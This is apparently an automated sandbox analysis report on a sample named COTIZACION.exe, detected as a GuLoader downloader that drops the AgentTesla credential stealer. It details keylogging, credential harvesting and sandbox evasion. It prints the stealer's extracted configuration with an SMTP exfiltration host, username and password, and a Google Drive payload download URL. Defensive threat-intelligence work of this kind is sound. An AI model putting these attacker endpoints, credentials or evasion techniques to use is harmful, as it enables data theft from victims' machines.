Edit tour

Windows Analysis Report
COTIZACION.exe

Overview

General Information

Sample name:	COTIZACION.exe
Analysis ID:	1549213
MD5:	ad3b285c00819c0aa52bb492ce560bc1
SHA1:	93dcb8eb3ac7fa43dc97cc36f203622adc195a8e
SHA256:	26cc490b994c070a5329725ef25a76af9afe2d4a9f5d11df8ed4c1dd040003f9
Tags:	exeuser-adrian__luca
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected GuLoader

AI detected suspicious sample

Installs a global keyboard hook

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

COTIZACION.exe (PID: 7316 cmdline: "C:\Users\user\Desktop\COTIZACION.exe" MD5: AD3B285C00819C0AA52BB492CE560BC1)

COTIZACION.exe (PID: 7796 cmdline: "C:\Users\user\Desktop\COTIZACION.exe" MD5: AD3B285C00819C0AA52BB492CE560BC1)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.showpiece.trillennium.biz", "Username": "build@showpiece.trillennium.biz", "Password": "3KJ[T.3]fsSW"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.2598720371.000000003832C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2598720371.0000000038334000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2598720371.0000000038301000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.2598720371.0000000038301000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2000502828.0000000006398000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: COTIZACION.exe PID: 7796	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: COTIZACION.exe PID: 7796	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 2 entries

Sigma Signatures

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DesusertionIp: 67.23.226.139, DesusertionIsIpv6: false, DesusertionPort: 587, EventID: 3, Image: C:\Users\user\Desktop\COTIZACION.exe, Initiated: true, ProcessId: 7796, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 64766

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T12:37:29.294568+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.9	49797	TCP
2024-11-05T12:38:10.074857+0100	2022930	1	A Network Trojan was detected	20.12.23.50	443	192.168.2.9	64762	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-05T12:38:31.323411+0100	2803270	2	Potentially Bad Traffic	192.168.2.9	64763	142.250.185.238	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: COTIZACION.exe.7316.0.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.showpiece.trillennium.biz", "Username": "build@showpiece.trillennium.biz", "Password": "3KJ[T.3]fsSW"}

Multi AV Scanner detection for submitted file

Source: COTIZACION.exe

ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: COTIZACION.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.9:64763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.9:64764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.9:64765 version: TLS 1.2

Source: COTIZACION.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 0_2_004066F7 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		0_2_004066F7
Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 0_2_004065AD FindFirstFileW,FindClose,		0_2_004065AD

Source: global traffic

TCP traffic: 192.168.2.9:64766 -> 67.23.226.139:587

Source: Joe Sandbox View	IP Address: 67.23.226.139 67.23.226.139
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205

Source: Joe Sandbox View

ASN Name: DIMENOCUS DIMENOCUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.9:64762
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:64763 -> 142.250.185.238:443
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.9:49797

Source: global traffic

TCP traffic: 192.168.2.9:64766 -> 67.23.226.139:587

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=11xDtcar0hiyF2UUiWFQDpA1Tws_HolqI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=11xDtcar0hiyF2UUiWFQDpA1Tws_HolqI&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=11xDtcar0hiyF2UUiWFQDpA1Tws_HolqI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=11xDtcar0hiyF2UUiWFQDpA1Tws_HolqI&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: mail.showpiece.trillennium.biz

Source: COTIZACION.exe, 00000005.00000002.2598720371.000000003832C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.showpiece.trillennium.biz
Source: COTIZACION.exe, 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmp, COTIZACION.exe, 00000000.00000000.1325260192.0000000000408000.00000002.00000001.01000000.00000003.sdmp, COTIZACION.exe, 00000005.00000002.2572340279.0000000000408000.00000002.00000001.01000000.00000003.sdmp, COTIZACION.exe, 00000005.00000000.1996163336.0000000000408000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error...
Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007C48000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2599338437.000000003A3CA000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2598720371.0000000038334000.00000004.00000800.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2578600930.0000000007C84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.i.lencr.org/0
Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007C48000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2599338437.000000003A3CA000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2598720371.0000000038334000.00000004.00000800.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2578600930.0000000007C84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://r11.o.lencr.org0#
Source: COTIZACION.exe, 00000005.00000002.2598720371.00000000382B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: COTIZACION.exe, 00000005.00000002.2598720371.000000003832C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://showpiece.trillennium.biz
Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007C48000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2599338437.000000003A3CA000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2598720371.0000000038334000.00000004.00000800.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2578600930.0000000007C84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007C48000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2599338437.000000003A3CA000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2598720371.0000000038334000.00000004.00000800.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2578600930.0000000007C84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: COTIZACION.exe, 00000005.00000002.2598720371.00000000382B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: COTIZACION.exe, 00000005.00000002.2598720371.00000000382B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: COTIZACION.exe, 00000005.00000002.2598720371.00000000382B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: COTIZACION.exe, 00000005.00000003.2129050802.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000003.2128991351.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: COTIZACION.exe, 00000005.00000002.2578974531.0000000009690000.00000004.00001000.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000002.2578600930.0000000007C84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=11xDtcar0hiyF2UUiWFQDpA1Tws_HolqI
Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007C84000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=11xDtcar0hiyF2UUiWFQDpA1Tws_HolqIM8
Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007C48000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/v
Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007CB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/H
Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007C9E000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000003.2129050802.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000003.2128991351.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=11xDtcar0hiyF2UUiWFQDpA1Tws_HolqI&export=download
Source: COTIZACION.exe, 00000005.00000003.2129050802.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000003.2128991351.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: COTIZACION.exe, 00000005.00000003.2129050802.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000003.2128991351.0000000007CB2000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000003.2128991351.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: COTIZACION.exe, 00000005.00000003.2129050802.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000003.2128991351.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: COTIZACION.exe, 00000005.00000003.2129050802.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000003.2128991351.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: COTIZACION.exe, 00000005.00000003.2129050802.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp, COTIZACION.exe, 00000005.00000003.2128991351.0000000007CC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 64763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 64765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64764

Source: unknown	HTTPS traffic detected: 142.250.185.238:443 -> 192.168.2.9:64763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.9:64764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.9:64765 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\Desktop\COTIZACION.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\COTIZACION.exe

Jump to behavior

Source: C:\Users\user\Desktop\COTIZACION.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Source: C:\Users\user\Desktop\COTIZACION.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\COTIZACION.exe

Code function: 0_2_004036DA EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,

0_2_004036DA

Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 0_2_70022351	0_2_70022351
Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 5_2_0015A950	5_2_0015A950
Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 5_2_0015D990	5_2_0015D990
Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 5_2_00154A98	5_2_00154A98
Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 5_2_00153E80	5_2_00153E80
Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 5_2_001541C8	5_2_001541C8
Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 5_2_3B23C220	5_2_3B23C220
Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 5_2_3B235648	5_2_3B235648
Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 5_2_3B236698	5_2_3B236698
Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 5_2_3B23B2C0	5_2_3B23B2C0
Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 5_2_3B233108	5_2_3B233108
Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 5_2_3B232338	5_2_3B232338
Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 5_2_3B237740	5_2_3B237740
Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 5_2_3B235D83	5_2_3B235D83
Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 5_2_3B230040	5_2_3B230040
Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 5_2_3B23E440	5_2_3B23E440
Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 5_2_3B71197B	5_2_3B71197B
Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 5_2_3B711988	5_2_3B711988
Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 5_2_3B874B48	5_2_3B874B48
Source: C:\Users\user\Desktop\COTIZACION.exe	Code function: 5_2_3B870448	5_2_3B870448

Source: COTIZACION.exe

Static PE information: invalid certificate

Source: COTIZACION.exe, 00000005.00000002.2578600930.0000000007C84000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs COTIZACION.exe
Source: COTIZACION.exe, 00000005.00000002.2598555666.0000000038089000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs COTIZACION.exe

Source: COTIZACION.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/12@4/4

Source: C:\Users\user\Desktop\COTIZACION.exe

0_2_004036DA

Source: C:\Users\user\Desktop\COTIZACION.exe

File created: C:\Users\user\overlays

Jump to behavior

Source: C:\Users\user\Desktop\COTIZACION.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\COTIZACION.exe

File created: C:\Users\user\AppData\Local\Temp\nsyA426.tmp

Jump to behavior

Source: COTIZACION.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\COTIZACION.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\COTIZACION.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\COTIZACION.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\COTIZACION.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: COTIZACION.exe

ReversingLabs: Detection: 63%

Source: C:\Users\user\Desktop\COTIZACION.exe

File read: C:\Users\user\Desktop\COTIZACION.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\COTIZACION.exe "C:\Users\user\Desktop\COTIZACION.exe"
Source: C:\Users\user\Desktop\COTIZACION.exe	Process created: C:\Users\user\Desktop\COTIZACION.exe "C:\Users\user\Desktop\COTIZACION.exe"
Source: C:\Users\user\Desktop\COTIZACION.exe	Process created: C:\Users\user\Desktop\COTIZACION.exe "C:\Users\user\Desktop\COTIZACION.exe"	Jump to behavior

Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\COTIZACION.exe	Section loaded: uxtheme.dll	Jump to behavior
